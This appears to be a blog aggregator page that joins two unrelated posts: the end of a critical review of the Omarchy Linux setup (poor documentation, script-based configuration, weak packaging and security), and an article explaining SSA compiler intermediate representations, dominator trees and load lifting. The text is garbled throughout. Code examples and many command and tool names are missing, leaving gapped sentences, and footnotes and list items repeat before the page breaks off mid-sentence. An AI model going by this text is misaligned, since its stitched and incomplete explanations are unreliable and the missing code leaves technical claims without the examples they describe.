for a range of what feels like outrageously expensive peripherals. For the truly informative content, look no further than the shell function guide, with gems such as: : Format an entire disk with a single ext4 partition. Be careful! Wow, thanks, Professor Oak, I will be! :-) On a more serious note, though, the documentation leaves much to be desired, as evidenced by the user questions over on the GitHub discussions page . Take this question , which unintentionally sums up the Omarchy experience for probably many inexperienced users: I installed this from github without knowing what I was getting into (the page is very minimal for a project of this size, and I forgot there was a link in the footnotes). Please tell me there’s a way to remove Omarchy without wiping my entire computer. I lost my flashdrive, and don’t have a way to back up all my important files anymore. While this may seem comical on the surface, it’s a sad testament to how Omarchy appears to have a knack for luring in unsuspecting users with flashy visuals and so called “reviews” on YouTube, only to leave them stranded without adequate documentation. The only recourse? Relying on the solid Arch docs, which is an abrupt plunge into the deep end, given that Arch assumes you’re at least familiar with its very basics and that you know how you set up your own system. Maybe GitHub isn’t the most representative forum for the project’s support; I haven’t tried Discord, for example. But no matter where the community is, users should be able to fend for themselves with proper documentation, turning to others only as a last resort. It’s difficult to compile a list of things that could have made Omarchy a reasonable setup for people to consider, mainly because, in my opinion, the core of the setup – scripts doing things they shouldn’t or that should have been handled by other means (e.g., the package manager) – is fundamentally flawed. That said, I do think it’s worth mentioning a few improvements that, if implemented, could have made Omarchy a less bad option. Configuration files should not be altered through loose migration scripts. Instead, updated configuration files should be provided directly (ideally via packages, see below) and applied as patches using a mechanism similar to etc-update or dpkg . This approach ensures clarity and reduces confusion, preserves user modifications, and aligns with established best practices. Improve on the user experience where necessary and maybe even contribute improvements back. Use proper software implementations where appropriate. Want a fancy screensaver? Extend Hyprlock instead of awkwardly repurposing a fullscreen terminal window to mimic one. Need to display power status notifications without relying on GNOME or KDE components? Develop a lightweight solution that integrates cleanly with the desktop environment, or extend the existing Waybar battery widget to send notifications. Don’t like existing Linux “App Store” options? Build your own, rather than diverting a launcher from its intended use only to run Bash scripts that install packages from third-party sources on a system that has a perfectly good package manager in place. Arguably the most crucial improvement: Package the required software and install it via the system’s package manager. Avoid relying on brittle scripts, third-party tools like mise , or worse, piping scripts directly into . I understand that the author is coming from an operating system where it’s sort of fine to and use software like to manage individual Ruby versions. However, we have to take into consideration that specifically macOS has a significantly more advanced security architecture in place than (unfortunately) most out-of-the-box Linux installations have, let alone Omarchy . On Hanssons setup the approach is neither sensible nor advisable, especially given that it’s ultimately a system that is built around a proper package manager. If you want multiple versions of Ruby, package them and use slotting (or the equivalent of it on the distribution that you’re using, e.g. installation to version-specific directories on Arch ). Much of what the migrations and other scripts attempt to do could, and should have been achieved through well-maintained packages and the proven mechanisms of a package manager. Whether it’s Gentoo , NixOS , or Ubuntu , each distribution operates in its own unique way, offering users a distinct set of tools and defaults. Yet, they all share one common trait: A set of strong, well-defined opinions that shape the system. Omarchy , in contrast, feels little more than a glorified collection of Hyprland configurations atop an unopinionated, barebones foundation. If you’re going to have opinions, don’t limit them to just nice colors and cute little wallpapers. Form opinions on the tools that truly matter, on how those tools should be configured, and on the more intricate, challenging aspects of the system, not just the surface-level, easy choices. Have opinions on the really sticky and complicated stuff, like power-saving modes, redundant storage, critical system functionality, and security. Above all, cultivate reasonable opinions, ones that others can get behind, and build a system that reflects those. Comprehensive documentation is essential to help users understand how the system works. Currently, there’s no clear explanation for the myriad Bash scripts, nor is there any user-facing guidance on how global system updates affect individual configuration files. ( finally… ) Omarchy feels like a project created by a Linux newcomer, utterly captivated by all the cool things that Linux can do , but lacking the architectural knowledge to get the basics right, and the experience to give each tool a thoughtful review. Instead of carefully selecting software and ensuring that everything works as promised, the approach seems to be more about throwing everything that somehow looks cool into a pile. There’s no attention to sensible defaults, no real quality control, and certainly no verification that the setup won’t end up causing harm or, at the very least, frustration for the user. The primary focus seems to be on creating a visually appealing but otherwise hollow product . Moreover, the entire Omarchy ecosystem is held together by often poorly written Bash scripts that lack any structure, let alone properly defined interfaces . Software packages are being installed via or similar mechanisms, rather than provided as properly packaged solutions via a package manager. Hansson is quick to label Omarchy a Linux distribution , yet he seems reluctant to engage with the foundational work that defines a true distribution: The development and proper packaging (“distribution”) of software . Whenever Hansson seeks a software (or software version) that is unavailable in the Arch package repositories, he bypasses the proper process of packaging it for the system. Instead, he resorts to running arbitrary scripts or tools that download the required software from third-party sources, rather than offering the desired versions through a more standardized package repository. Hansson also appears to avoid using lower-level programming languages to implement features in a more robust and maintainable manner at all costs , often opting instead for makeshift solutions, such as executing “hacky” Bash scripts through timers. A closer look at his GitHub profile and Basecamp’s repositories reveals that Hansson has seemingly worked exclusively with Ruby and JavaScript , with most contributions to more complex projects, like or , coming from other developers. This observation is not meant to diminish the author’s profession and accomplishments as a web developer, but it highlights the lack of experience in areas such as systems programming, which are crucial for the type of work required to build and maintain a proper Linux distribution. Speaking of packages, the system gobbles up 15GB of storage on a basic install, yet fails to deliver truly useful or high-quality software. It includes a hodgepodge of packages, like OpenJDK and websites of paid services in “App” -disguise, but lacks any real optimization for specific use cases. Despite Omarchy claiming to be opinionated most of the included software is left at its default settings, straight from the developers. Given Hansson ’s famously strong opinions on everything, it makes me wonder if the Omarchy author simply hasn’t yet gained the experience necessary to develop clear, informed stances on individual configurations. Moreover, his prioritization of his paid products like Basecamp and HEY over his own free software like Rails leaves a distinctly bitter aftertaste when considering Omarchy . What’s even more baffling is that seemingly no one at Framework (Computer Inc.) or Cloudflare appears to have properly vetted the project they’re directing attention (and sometimes financial support) to. I find it hard to believe that knowledgeable people at either company have looked at Omarchy and thought, “Out of all the Linux distributions out there, this barely configured stack of poorly written Bash scripts on top of Arch is clearly the best choice for us to support!” In fact, I would go as far as to call it a slap in the face to each and every proper distro maintainer and FOSS developer. Furthermore, I fail to see the supposed gap Omarchy is trying to fill. A fresh installation of Arch Linux, or any of its established derivatives like Manjaro , is by no means more complicated or time-consuming than Omarchy . In fact, it is Omarchy that complicates things further down the line, by including a number of unnecessary components and workarounds, especially when it comes to its chosen desktop environment. The moment an inexperienced user wants or needs to change anything, they’ll be confronted with a jumbled mess that’s difficult to understand and even harder to manage. If you want Arch but are too lazy to read through its fantastic Wiki , then look at Manjaro , it’ll take care of you. If that’s still not to your liking, maybe explore something completely different . On the other hand, if you’re just looking to tweak your existing desktop, check out other people’s dotfiles and dive into the unixporn communities for inspiration. As boring as Fedora Workstation or Ubuntu Desktop might sound, these are solid choices for anyone who doesn’t want to waste time endlessly configuring their OS and, more importantly, wants something that works right out of the box and actually keeps them safe. Fedora Workstation comes with SELinux enabled in “enforcing” mode by default, and Ubuntu Desktop utilizes AppArmor out of the box. Note: Yes, I hear you loud and clear, SuSE fans. The moment your favorite distro gets its things together with regard to the AppArmor-SELinux transition and actually enables SELinux in enforcing mode across all its different products and versions I will include it here as well. Omarchy is essentially an installation routine for someone else’s dotfiles slapped on top of an otherwise barebones Linux desktop. Although you could simply run its installation scripts on your existing, fully configured Arch system, it doesn’t seem to make much sense and it’s definitely not the author’s primary objective. If this was just Hansson’s personal laptop setup, nobody, including myself, would care about the oversights or eccentricities, but it is not. In fact, this project is clearly marketed to the broader, less experienced user base, with Hansson repeatedly misrepresenting Omarchy as being “for developers or anyone interested in a pro system” . I emphasize marketed here, because Hansson is using his reach and influence in every possible way to advertise and seemingly monetize Omarchy ; Apart from the corporate financial support, the project even has its own merch that people can spend money on. Given that numerous YouTubers have been heavily promoting the project over the past few weeks, often in the same breath with Framework (Computer Inc.) , it wouldn’t be surprising to see the company soon offering it as a pre-installation option on their hardware. If you’re serious about Linux, you’re unlikely to fall for the Omarchy sales pitch. However, if you’re an inexperienced user who’s heard about Omarchy from a tech-influencer raving about it, I strongly recommend starting your Linux journey elsewhere, with a distribution that actually prioritizes your security and system integrity, and is built and maintained by people who live and breathe systems, and especially Linux. Alright, that’s it. Why don’t any of the Bash scripts and functions provide a flag or maybe even autocompletions? Why are there no Omarchy -related pages? Why does the system come with GNOME Files , which requires several gvfs processes running in the background, yet it lacks basic command-line file managers like or ? Why would you define as an for unconditionally, but not install Rails by default? Why bother shipping tools like and but fail to provide aliases for , , etc to make use of these tools by default? Why wouldn’t you set up an O.G. alias like in your defaults ? Why ship the GNOME Calculator but not include any command-line calculators (e.g., , ), forcing users to rely on basics like ? Why ship the full suite of LibreOffice, but not a single useful terminal tool like , , , etc.? Why define functions like with and without an option to enable encryption, when the rest of the system uses and ? And if it’s intended for use by inexperienced users primarily for things like USB sticks, why not make it instead of so the drive works across most operating systems? Why not define actually useful functions like or / ? Why doesn’t your Bash configuration include history- and command-flag-based auto-suggestions? Or a terminal-independent vi mode ? Or at least more consistent Emacs-style shortcuts? Why don’t you include some quality-of-life tools like or some other command-line community favorites? If you had to squeeze in ChatGPT , why not have Crush available by default? Why does the base install with a single running Alacritty window occupy over 2.2GB of RAM right after booting? For comparison: My Gentoo system with a single instance of Ghostty ends up at around half of that. Why set up NeoVim but not define as an alias for , or even create a symlink? And speaking of NeoVim , why does the supposedly opinionated config make NeoVim feel slower than VSCode ?

0 views
mcyoung 1 months ago

Why SSA?

If you’ve read anything about compilers in the last two decades or so, you have almost certainly heard of SSA compilers , a popular architecture featured in many optimizing compilers, including ahead-of-time compilers such as LLVM, GCC, Go, CUDA (and various shader compilers), Swift 1 , and MSVC 2 , and just-in-time compilers such as HotSpot C2 3 , V8 4 , SpiderMonkey 5 , LuaJIT, and the Android Runtime 6 . SSA is hugely popular, to the point that most compiler projects no longer bother with other IRs for optimization 7 . This is because SSA is incredibly nimble at the types of program analysis and transformation that compiler optimizations want to do on your code. But why ? Many of my friends who don’t do compilers often say that compilers seem like opaque magical black boxes, and SSA, as it often appears in the literature, is impenetrably complex. But it’s not! SSA is actually very simple once you forget everything you think your programs are actually doing. We will develop the concept of SSA form, a simple SSA IR, prove facts about it, and design some optimizations on it. I have previously written about the granddaddy of all modern SSA compilers, LLVM. This article is about SSA in general, and won’t really have anything to do with LLVM. However, it may be helpful to read that article to make some of the things in this article feel more concrete. SSA is a property of intermediate representations (IRs), primarily used by compilers for optimizing imperative code that target a register machine . Register machines are computers that feature a fixed set of registers that can be used as the operands for instructions: this includes virtually all physical processors, including CPUs, GPUs, and weird tings like DSPs. SSA is most frequently found in compiler middle-ends , the optimizing component between the frontend (which deals with the surface language programmers write, and lowers it into the middle-end’s IR), and the backend (which takes the optimized IR and lowers it into the target platform’s assembly). SSA IRs, however, often have little resemblance to the surface language they lower out of, or the assembly language they target. This is because neither of these representations make it easy for a compiler to intuit optimization opportunities. Imperative code consists of a sequence of operations that mutate the executing machine’s state to produce a desired result. For example, consider the following C program: This program returns no matter what its input is, so we can optimize it down to this: But, how would you write a general algorithm to detect that all of the operations cancel out? You’re forced to keep in mind program order to perform the necessary dataflow analysis, following mutations of and through the program. But this isn’t very general, and traversing all of those paths makes the search space for large functions very big. Instead, you would like to rewrite the program such that and gradually get replaced with the expression that calculates the most recent value, like this: Then we can replace each occurrence of a variable with its right-hand side recursively… Then fold the constants together… And finally, we see that we’re returning , and can replace it with . All the other variables are now unused, so we can delete them. The reason this works so well is because we took a function with mutation, and converted it into a combinatorial circuit , a type of digital logic circuit that has no state, and which is very easy to analyze. The dependencies between nodes in the circuit (corresponding to primitive operations such as addition or multiplication) are obvious from its structure. For example, consider the following circuit diagram for a one-bit multiplier: This graph representation of an operation program has two huge benefits: The powerful tools of graph theory can be used to algorithmically analyze the program and discover useful properties, such as operations that are independent of each other or whose results are never used. The operations are not ordered with respect to each other except when there is a dependency; this is useful for reordering operations, something compilers really like to do. The reason combinatorial circuits are the best circuits is because they are directed acyclic graphs (DAGs) which admit really nice algorithms. For example, longest path in a graph is NP-hard (and because P ≠ N P P \neq NP P  = NP 8 , has complexity O ( 2 n ) O(2^n) O ( 2 n ) ). However, if the graph is a DAG, it admits an O ( n ) O(n) O ( n ) solution! To understand this benefit, consider another program: Suppose we wanted to replace each variable with its definition like we did before. We can’t just replace each constant variable with the expression that defines it though, because we would wind up with a different program! Now, we pick up an extra term because the squaring operation is no longer unused! We can put this into circuit form, but it requires inserting new variables for every mutation. But we can’t do this when complex control flow is involved! So all of our algorithms need to carefully account for mutations and program order, meaning that we don’t get to use the nice graph algorithms without careful modification. SSA stands for “static single assignment”, and was developed in the 80s as a way to enhance the existing three-argument code (where every statement is in the form ) so that every program was circuit-like, using a very similar procedure to the one described above. The SSA invariant states that every variable in the program is assigned to by precisely one operation. If every operation in the program is visited once, they form a combinatorial circuit. Transformations are required to respect this invariant. In circuit form, a program is a graph where operations are nodes, and “registers” (which is what variables are usually called in SSA) are edges (specifically, each output of an operation corresponds to a register). But, again, control flow. We can’t hope to circuitize a loop, right? The key observation of SSA is that most parts of a program are circuit-like. A basic block is a maximal circuital component of a program. Simply put, it is a sequence of non-control flow operations, and a final terminator operation that transfers control to another basic block. The basic blocks themselves form a graph, the control flow graph , or CFG. This formulation of SSA is sometimes called SSA-CFG 9 . This graph is not a DAG in general; however, separating the program into basic blocks conveniently factors out the “non-DAG” parts of the program, allowing for simpler analysis within basic blocks. There are two equivalent formalisms for SSA-CFG. The traditional one uses special “phi” operations (often called phi nodes , which is what I will call them here) to link registers across basic blocks. This is the formalism LLVM uses. A more modern approach, used by MLIR, is block arguments : each basic block specifies parameters, like a function, and blocks transferring control flow to it must pass arguments of those types to it. Let’s look at some code. First, consider the following C function which calculates Fibonacci numbers using a loop. How might we express this in an SSA-CFG IR? Let’s start inventing our SSA IR! It will look a little bit like LLVM IR, since that’s what I’m used to looking at. Every block ends in a , which transfers control to one of several possible blocks. In the process, it calls that block with the given arguments. One can think of a basic block as a tiny function which tails 10 into other basic blocks in the same function. aside Phi Nodes LLVM IR is… older, so it uses the older formalism of phi nodes. “Phi” comes from “phony”, because it is an operation that doesn’t do anything; it just links registers from predecessors. A operation is essentially a switch-case on the predecessors, each case selecting a register from that predecessor (or an immediate). For example, has two predecessors, the implicit entry block , and . In a phi node IR, instead of taking a block argument for , it would specify The value of the operation is the value from whichever block jumped to this one. This can be awkward to type out by hand and read, but is a more convenient representation for describing algorithms (just “add a phi node” instead of “add a parameter and a corresponding argument”) and for the in-memory representation, but is otherwise completely equivalent. It’s a bit easier to understand the transformation from C to our IR if we first rewrite the C to use goto instead of a for loop: However, we still have mutation in the picture, so this isn’t SSA. To get into SSA, we need to replace every assignment with a new register, and somehow insert block arguments… The above IR code is already partially optimized; the named variables in the C program have been lifted out of memory and into registers. If we represent each named variable in our C program with a pointer, we can avoid needing to put the program into SSA form immediately. This technique is used by frontends that lower into LLVM, like Clang. We’ll enhance our IR by adding a declaration for functions, which defines scratch space on the stack for the function to use. Each stack slot produces a pointer that we can from and to. Our Fibonacci function would now look like so: Any time we reference a named variable, we load from its stack slot, and any time we assign it, we store to that slot. This is very easy to get into from C, but the code sucks because it’s doing lots of unnecessary pointer operations. How do we get from this to the register-only function I showed earlier? aside Program Order We want program order to not matter for the purposes of reordering, but as we’ve written code here, program order does matter: loads depend on prior stores but stores don’t produce a value that can be used to link the two operations. We can restore not having program order by introducing operands representing an “address space”; loads and stores take an address space as an argument, and stores return a new address space. An address space, or , represents the state of some region of memory. Loads and stores are independent when they are not connected by a argument. This type of enhancement is used by Go’s SSA IR, for example. However, it adds a layer of complexity to the examples, so instead I will hand-wave this away. Now we need to prove some properties about CFGs that are important for the definition and correctness of our optimization passes. First, some definitions. The predecessors (or “preds”) of a basic block is the set of blocks with an outgoing edge to that block. A block may be its own predecessors. Some literature calls the above “direct” or immediate predecessors. For example, the preds of in our example are are (the special name for the function entry-point) . The successors (no, not “succs”) of a basic block is the set of blocks with an outgoing edge from that block. A block may be its own successors. The sucessors of are and . The successors are listed in the loop’s . If a block is a transitive pred of a block , we say that weakly dominates , or that it is a weak dominator of . For example, , and both weakly dominate . However, this is not usually an especially useful relationship. Instead, we want to speak of dominators: A block is a dominator (or dominates ) if every pred of is dominated by , or if is itself. Equivalently, the dominator set of is the intersection of the dominator sets of its preds, plus . The dominance relation has some nice order properties that are necessary for defining the core graph algorithms of SSA. We only consider CFGs which are flowgraphs, that is, all blocks are reachable from the root block , which has no preds. This is necessary to eliminate some pathological graphs from our proofs. Importantly, we can always ask for an acyclic path 11 from to any block . An equivalent way to state the dominance relationship is that from every path from to contains all of ’s dominators. proposition dominates iff every path from to contains . First, assume every to path contains . If is , we’re done. Otherwise we need to prove each predecessor of is dominated by ; we do this by induction on the length of acyclic paths from to . Consider preds of that are not , and consider all acyclic paths p p p from to ; by appending to them, we have an acyclic path p ′ p' p ′ from to , which must contain . Because both the last and second-to-last elements of this are not , it must be within the shorter path p p p which is shorter than p ′ p' p ′ . Thus, by induction, dominates and therefore Going the other way, if dominates , and consider a path p p p from to . The second-to-last element of p p p is a pred of ; if it is we are done. Otherwise, we can consider the path p p p made by deleting at the end. is dominated by , and p ′ p' p ′ is shorter than p p p , so we can proceed by induction as above. Onto those nice properties. Dominance allows us to take an arbitrarily complicated CFG and extract from it a DAG, composed of blocks ordered by dominance. The dominance relation is a partial order. Dominance is reflexive and transitive by definition, so we only need to show blocks can’t dominate each other. Suppose distinct and dominate each other.Pick an acyclic path p p p from to . Because dominates , there is a prefix p ′ p' p ′ of this path ending in . But because dominates , some prefix p ′ ′ p'' p ′′ of p ′ p' p ′ ends in . But now p p p must contain twice, contradicting that it is acyclic. This allows us to write when dominates . There is an even more refined graph structure that we can build out of dominators, which follows immediately from the partial order theorem. The dominators of a basic block are totally ordered by the dominance relation. Suppose and , but neither dominates the other. Then, there must exist acyclic paths from to which contain both, but in different orders. Take the subpaths of those paths which follow , and , neither of which contains . Concatenating these paths yields a path from to that does not contain , a contradiction. This tells us that the DAG we get from the dominance relation is actually a tree, rooted at . The parent of a node in this tree is called its immediate dominator . Computing dominators can be done iteratively: the dominator set of a block is the intersection the dominator sets of its preds, plus . This algorithm runs in quadratic time. A better algorithm is the Lengauer-Tarjan algorithm[^lta]. It is relatively simple, but explaining how to implement it is a bit out of scope for this article. I found a nice treatment of it here . What’s important is we can compute the dominator tree without breaking the bank, and given any node, we can ask for its immediate dominator. Using immediate dominators, we can introduce the final, important property of dominators. The dominance frontier of a block is the set of all blocks not dominated by with at least one pred which dominates. These are points where control flow merges from distinct paths: one containing and one not. The dominance frontier of is , whose preds are and . There are many ways to calculate dominance frontiers, but with a dominance tree in hand, we can do it like this: algorithm Dominance Frontiers. For each block with more than one pred, for each of its preds, let be that pred. Add to the dominance frontier of and all of its dominators, stopping when encountering ’ immediate dominator. We need to prove that every block examined by the algorithm winds up in the correct frontiers. First, we check that every examined block is added to the correct frontier. If , where is a pred of , and a is ’s immediate dominator, then if , is not in its frontier, because must dominate . Otherwise, must be in ’s frontier, because dominates a pred but it cannot dominate , because then it would be dominated by , a contradiction. Second, we check that every frontier is complete. Consider a block . If an examined block is in its frontier, then must be among the dominators of some pred , and it must be dominated by ’s immediate dominator; otherwise, would dominate (and thus would not be in its frontier). Thus, gets added to ’s dominator. You might notice that all of these algorithms are quadratic. This is actually a very good time complexity for a compilers-related graph algorithm. Cubic and quartic algorithms are not especially uncommon, and yes, your optimizing compiler’s time complexity is probably cubic or quartic in the size of the program! Ok. Let’s construct an optimization. We want to figure out if we can replace a load from a pointer with the most recent store to that pointer. This will allow us to fully lift values out of memory by cancelling out store/load pairs. This will make use of yet another implicit graph data structure. The dataflow graph is the directed graph made up of the internal circuit graphs of each each basic block, connected along block arguments. To follow a use-def chain is to walk this graph forward from an operation to discover operations that potentially depend on it, or backwards to find operations it potentially depends on. It’s important to remember that the dataflow graph, like the CFG, does not have a well defined “up” direction. Navigating it and the CFG requires the dominator tree. One other important thing to remember here is that every instruction in a basic block always executes if the block executes. In much of this analysis, we need to appeal to “program order” to select the last load in a block, but we are always able to do so. This is an important property of basic blocks that makes them essential for constructing optimizations. For a given , we want to identify all loads that depend on it. We can follow the use-def chain of to find which blocks contain loads that potentially depend on the store (call it ). First, we can eliminate loads within the same basic block (call it ). Replace all instructions after (but before any other s, in program order) with ’s def. If is not the last store in this block, we’re done. Otherwise, follow the use-def chain of to successors which use , i.e., successors whose case has as at least one argument. Recurse into those successors, and now replacing the pointer of interest with the parameters of the successor which were set to (more than one argument may be ). If successor loads from one of the registers holding , replace all such loads before a store to . We also now need to send into somehow. This is where we run into something of a wrinkle. If has exactly one predecessor, we need to add a new block argument to pass whichever register is holding (which exists by induction). If is already passed into by another argument, we can use that one. However, if has multiple predecessors, we need to make sure that every path from to sends , and canonicalizing those will be tricky. Worse still, if is in ’s domination frontier, a different store could be contributing to that load! For this reason, dataflow from stores to loads is not a great strategy. Instead, we’ll look at dataflow from loads backwards to stores (in general, dataflow from uses to defs tends to be more useful), which we can use to augment the above forward dataflow analysis to remove the complex issues around domination frontiers. Let’s analyze loads instead. For each in , we want to determine all stores that could potentially contribute to its value. We can find those stores as follows: We want to be able to determine which register in a given block corresponds to the value of , and then find its last store in that block. To do this, we’ll flood-fill the CFG backwards in BFS order. This means that we’ll follow preds (through the use-def chain) recursively, visiting each pred before visiting their preds, and never revisiting a basic block (except we may need to come back to at the end). Determining the “equivalent” 12 of in (we’ll call it ) can be done recursively: while examining , follow the def of . If is a block parameter, for each pred , set to the corresponding argument in the case in ’s . Using this information, we can collect all stores that the load potentially depends on. If a predecessor stores to , we add the last such store in (in program order) to our set of stores, and do not recurse to ’s preds (because this store overwrites all past stores). Note that we may revisit in this process, and collect a store to from it occurs in the block. This is necessary in the case of loops. The result is a set of pairs. In the process, we also collected a set of all blocks visited, , which are dominators of which we need to plumb a through. This process is called memory dependency analysis , and is a key component of many optimizations. Not all contributing operations are stores. Some may be references to globals (which we’re disregarding), or function arguments or the results of a function call (which means we probably can’t lift this load). For example gets traced all the way back to a function argument, there is a code path which loads from a pointer whose stores we can’t see. It may also trace back to a stack slot that is potentially not stored to. This means there is a code path that can potentially load uninitialized memory. Like LLVM, we can assume this is not observable behavior, so we can discount such dependencies. If all of the dependencies are uninitialized loads, we can potentially delete not just the load, but operations which depend on it (reverse dataflow analysis is the origin of so-called “time-traveling” UB). Now that we have the full set of dependency information, we can start lifting loads. Loads can be safely lifted when all of their dependencies are stores in the current function, or dependencies we can disregard thanks to UB in the surface language (such as loads or uninitialized loads). There is a lot of fuss in this algorithm about plumbing values through block arguments. A lot of IRs make a simplifying change, where every block implicitly receives the registers from its dominators as block arguments. I am keeping the fuss because it makes it clearer what’s going on, but in practice, most of this plumbing, except at dominance frontiers, would be happening in the background. Suppose we can safely lift some load. Now we need to plumb the stored values down to the load. For each block in (all other blocks will now be in unless stated otherwise). We will be building two mappings: one , which is the register equivalent to in that block. We will also be building a map , which is the value that must have in that block. Prepare a work queue, with each in it initially. Pop a block form the queue. For each successor (in ): If isn’t already defined, add it as a block argument. Have pass to that argument. If hasn’t been visited yet, and isn’t the block containing the load we’re deleting, add it to the queue. Once we’re done, if is the block that contains the load, we can now replace all loads to before any stores to with . There are cases where this whole process can be skipped, by applying a “peephole” optimization. For example, stores followed by loads within the same basic block can be optimized away locally, leaving the heavy-weight analysis for cross-block store/load pairs. Here’s the result of doing dependency analysis on our Fibonacci function. Each load is annotated with the blocks and stores in . Let’s look at . Is contributing loads are in and . So we add a new parameter : in , we call that parameter with (since that’s stored to it in ), while in , we pass . What about L4? The contributing loads are also in and , but one of those isn’t a pred of . is also in the subgraph for this load, though. So, starting from , we add a new parameter to and feed (the stored value, an immediate this time) through it. Now looking at , we see there is already a parameter for this load ( ), so we just pass as that argument. Now we process , which pushed onto the queue. gets a new parameter , which is fed ’s own . We do not re-process , even though it also appears in ’s gotos, because we already visited it. After doing this for the other two loads, we get this: After lifting, if we know that a stack slot’s pointer does not escape (i.e., none of its uses wind up going into a function call 13 ) or a write to a global (or a pointer that escapes), we can delete every store to that pointer. If we delete every store to a stack slot, we can delete the stack slot altogether (there should be no loads left for that stack slot at this point). This analysis is simple, because it assumes pointers do not alias in general. Alias analysis is necessary for more accurate dependency analysis. This is necessary, for example, for lifting loads of fields of structs through subobject pointers, and dealing with pointer arithmetic in general. However, our dependency analysis is robust to passing different pointers as arguments to the same block from different predecessors. This is the case that is specifically handled by all of the fussing about with dominance frontiers. This robustness ultimately comes from SSA’s circuital nature. Similarly, this analysis needs to be tweaked to deal with something like (a ternary, essentially). s of pointers need to be replaced with s of the loaded values, which means we need to do the lifting transformation “all at once”: lifting some liftable loads will leave the IR in an inconsistent state, until all of them have been lifted. Many optimizations will make a mess of the CFG, so it’s useful to have simple passes that “clean up” the mess left by transformations. Here’s some easy examples. If an operation’s result has zero uses, and the operation has no side-effects, it can be deleted. This allows us to then delete operations that it depended on that now have no side effects. Doing this is very simple, due to the circuital nature of SSA: collect all instructions whose outputs have zero uses, and delete them. Then, examine the defs of their operands; if those operations now have no uses, delete them, and recurse. This bubbles up all the way to block arguments. Deleting block arguments is a bit trickier, but we can use a work queue to do it. Put all of the blocks into a work queue. Pop a block from the queue. Run unused result elimination on its operations. If it now has parameters with no uses, remove those parameters. For each pred, delete the corresponding arguments to this block. Then, Place those preds into the work queue (since some of their operations may have lost their last use). If there is still work left, go to 1. There are many CFG configurations that are redundant and can be simplified to reduce the number of basic blocks. For example, unreachable code can help delete blocks. Other optimizations may cause the at the end of a function to be empty (because all of its successors were optimized away). We treat an empty as being unreachable (since it has no cases!), so we can delete every operation in the block up to the last non-pure operation. If we delete every instruction in the block, we can delete the block entirely, and delete it from its preds’ s. This is a form of dead code elimination , or DCE, which combines with the previous optimization to aggressively delete redundant code. Some jumps are redundant. For example, if a block has exactly one pred and one successor, the pred’s case for that block can be wired directly to the successor. Similarly, if two blocks are each other’s unique predecessor/successor, they can be fused , creating a single block by connecting the input blocks’ circuits directly, instead of through a . If we have a ternary operation, we can do more sophisticated fusion. If a block has two successors, both of which the same unique successor, and those successors consist only of gotos, we can fuse all four blocks, replacing the CFG diamond with a . In terms of C, this is this transformation: LLVM’s CFG simplification pass is very sophisticated and can eliminate complex forms of control flow. I am hoping to write more about SSA optimization passes. This is a very rich subject, and viewing optimizations in isolation is a great way to understand how a sophisticated optimization pipeline is built out of simple, dumb components. It’s also a practical application of graph theory that shows just how powerful it can be, and (at least in my opinion), is an intuitive setting for understanding graph theory, which can feel very abstract otherwise. In the future, I’d like to cover CSE/GVN, loop optimizations, and, if I’m feeling brave, getting out of SSA into a finite-register machine (backends are not my strong suit!). Specifically the Swift frontend before lowering into LLVM IR.  ↩ Microsoft Visual C++, a non-conforming C++ compiler sold by Microsoft  ↩ HotSpot is the JVM implementation provided by OpenJDK; C2 is the “second compiler”, which has the best performance among HotSpot’s Java execution engines.  ↩ V8 is Chromium’s JavaScript runtime.  ↩ SpiderMonkey is Firefox’s JavaScript runtime.  ↩ The Android Runtime (ART) is the “JVM” (scare quotes) on the Android platform.  ↩ The Glasgow Haskell Compiler (GHC), does not use SSA; it (like some other pure-functional languages) uses a continuation-oriented IR (compare to Scheme’s ).  ↩ Every compiler person firmly believes that P ≠ N P P \neq NP P  = NP , because program optimization is full of NP-hard problems and we would have definitely found polynomial ideal register allocation by now if it existed.  ↩ Some more recent IRs use a different version of SSA called “structured control flow”, or SCF. Wasm is a notable example of an SCF IR. SSA-SCF is equivalent to SSA-CFG, and polynomial time algorithms exist for losslessly converting between them (LLVM compiling Wasm, for example, converts its CFG into SCF using a “relooping algorithm”). In SCF, operations like switch statements and loops are represented as macro operations that contain basic blocks. For example, a operation might take a value as input, select a basic block to execute based on that, and return the value that basic block evaluates to as its output. RVSDG is a notable innovation in this space, because it allows circuit analysis of entire imperative programs. I am convering SSA-CFG instead of SSA-SCF simply because it’s more common, and because it’s what LLVM IR is. See also this MLIR presentation for converting between the two.  ↩ Tail calling is when a function call is the last operation in a function; this allows the caller to jump directly to the callee, recycling its own stack frame for it instead of requiring it to allocate its own.  ↩ Given any path from to , we can make it acyclic by replacing each subpath from to with a single node.  ↩ When moving from a basic block to a pred, a register in that block which is defined as a block parameter corresponds to some register (or immediate) in each predecessor. That is the “equivalent” of . One possible option for the “equivalent” is an immediate: for example, or the address of a global. In the case of a global , assuming no data races, we would instead need alias information to tell if stores to this global within the current function (a) exist and (b) are liftable at all. If the equivalent is , we can proceed in one of two ways depending on optimization level. If we want loads of to trap (as in Go), we need to mark this load as not being liftable, because it may trap. If we want loads of to be UB, we simply ignore that pred, because we can assume (for our analysis) that if the pointer is , it is never loaded from.  ↩ Returned stack pointers do not escape: stack slots’ lifetimes end at function exit, so we return a dangling pointer, which we assume are never loaded. So stores to that pointer before returning it can be discarded.  ↩ The powerful tools of graph theory can be used to algorithmically analyze the program and discover useful properties, such as operations that are independent of each other or whose results are never used. The operations are not ordered with respect to each other except when there is a dependency; this is useful for reordering operations, something compilers really like to do. Prepare a work queue, with each in it initially. Pop a block form the queue. For each successor (in ): If isn’t already defined, add it as a block argument. Have pass to that argument. If hasn’t been visited yet, and isn’t the block containing the load we’re deleting, add it to the queue. Pop a block from the queue. Run unused result elimination on its operations. If it now has parameters with no uses, remove those parameters. For each pred, delete the corresponding arguments to this block. Then, Place those preds into the work queue (since some of their operations may have lost their last use). If there is still work left, go to 1. Specifically the Swift frontend before lowering into LLVM IR.  ↩ Microsoft Visual C++, a non-conforming C++ compiler sold by Microsoft  ↩ HotSpot is the JVM implementation provided by OpenJDK; C2 is the “second compiler”, which has the best performance among HotSpot’s Java execution engines.  ↩ V8 is Chromium’s JavaScript runtime.  ↩ SpiderMonkey is Firefox’s JavaScript runtime.  ↩ The Android Runtime (ART) is the “JVM” (scare quotes) on the Android platform.  ↩ The Glasgow Haskell Compiler (GHC), does not use SSA; it (like some other pure-functional languages) uses a continuation-oriented IR (compare to Scheme’s ).  ↩ Every compiler person firmly believes that P ≠ N P P \neq NP P  = NP , because program optimization is full of NP-hard problems and we would have definitely found polynomial ideal register allocation by now if it existed.  ↩ Some more recent IRs use a different version of SSA called “structured control flow”, or SCF. Wasm is a notable example of an SCF IR. SSA-SCF is equivalent to SSA-CFG, and 